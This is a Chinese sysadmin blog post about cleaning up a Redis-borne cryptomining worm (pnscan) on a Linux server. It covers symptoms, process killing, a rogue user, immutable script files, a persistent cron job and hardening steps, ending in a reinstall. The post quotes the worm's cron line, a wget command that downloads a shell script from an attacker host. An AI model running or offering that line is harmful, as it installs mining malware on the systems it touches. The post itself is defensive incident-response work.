客户Liunx服务器挖矿病毒排查pnscan占用cpu和内存100%原创文章

玩技站长
玩技站长
玩技站长
管理员, Keymaster
10824
文章
669
评论
运维笔记评论348字数 849阅读2分49秒阅读模式

>>病毒后果<<

  • 使用top & ps & netstat 等等命令,都无法正常使用
  • CPU基本100%,时不时网络中断
  • redis端口6379被大规则线程占用
  • 通过lsof -i:6379 查看进程,发现进程id一直在变动
  • rm -rf 攻击的脚本,显示没权限

>>温馨提示<<文章源自玩技e族-https://www.playezu.com/134168.html

  • 最终因为被感染的文件实在太多,只能重装系统。尽管删除了核心的攻击脚本,但是很多脚本命令也被破坏了。
  • 如果整个排查过程对你有帮助,请继续看,如果你想彻底解决掉,可以关闭此页面了。

>>查询结果<<文章源自玩技e族-https://www.playezu.com/134168.html

客户Liunx服务器挖矿病毒排查pnscan占用cpu和内存100%插图文章源自玩技e族-https://www.playezu.com/134168.html

>>删除进程<<文章源自玩技e族-https://www.playezu.com/134168.html

发现pnscan相关进程,全部kill,查询占用名字whereis然后删除/usr/local/bin目录下的pnscan脚本。文章源自玩技e族-https://www.playezu.com/134168.html

>>查找用户<<文章源自玩技e族-https://www.playezu.com/134168.html

然后通过/var/log查看日志,系统莫名注册了个vtab的系统用户,而且系统用户全部权限都被篡改也无法删除。文章源自玩技e族-https://www.playezu.com/134168.html

[root@localhost /]# userdel -r vtab

>>文件权限<<文章源自玩技e族-https://www.playezu.com/134168.html

这个蠕虫脚本写的那是非常不错的,逻辑缜密清晰,高手!不管三七二十一,分清了敌我,然后开始全面kill相关进程以及清除相关脚本和其他文件;另外,updata.sh/sysupdata.sh等这些脚本直接rm无法清除掉,因为这些文件都包含了i属性,使用指令lsattr 文件名可查看文件属性,如下:文章源自玩技e族-https://www.playezu.com/134168.html

[root@JD etc]# lsattr updata.sh
----i----------- updata.sh

知道原因后就好办了,执行指令chattr -i 文件名,更改文件i属性,如下文章源自玩技e族-https://www.playezu.com/134168.html

[root@JD etc]# chattr -i updata.sh

还是没什么用仍然显示没权限。

>>定时任务<<

删除后重启服务器还是,删除的脚本文件又重新安装运行回来了,查看了定时任务,发现定时任务也被修改了,原来一直在执行下载和更新脚本的代码。而且一直无法删除这项定时任务。

wget -q -O- http://oracle.zzhreceive.top/b2f628/b.sh

>>寻找阿里<<

无奈向阿里云发起工单,也没什么号的结果办法,只能备份系统盘后重新初始化,然后再通过快照的方式挂载到新的系统中。

客户Liunx服务器挖矿病毒排查pnscan占用cpu和内存100%插图1

>>排查总结<<

如果想彻底解决这个毒瘤,需要恢复的内容很多、且需要完全把攻击的脚本看懂,否者也不能彻底恢复
想想本人能力还有限 ,有这个时间,不如重新安装一个系统。
此服务器个人学习使用,安全问题自己关注的很少。至少任何服务开启的时候,以后都要设置密码!!
如果可以,防火墙设置固定的IP地址访问的权限、常用的端口,如80/3306/6379等等,可以设置其他非默认端口。
有时间大致研究下附录脚本,发现自己与大神的距离有多远,不学习只能被虐了!学习动力瞬间up,up,up

>>安全加固<<

使用了证书登录方式,加强的安全组策略,6379的端口不开放,添加了sql防注入机制,添加了服务器登录通知,添加了ddos防止被攻击瘫痪。

 最后更新:2023-2-13
匿名

发表评论

匿名网友
确定

拖动滑块以完成验证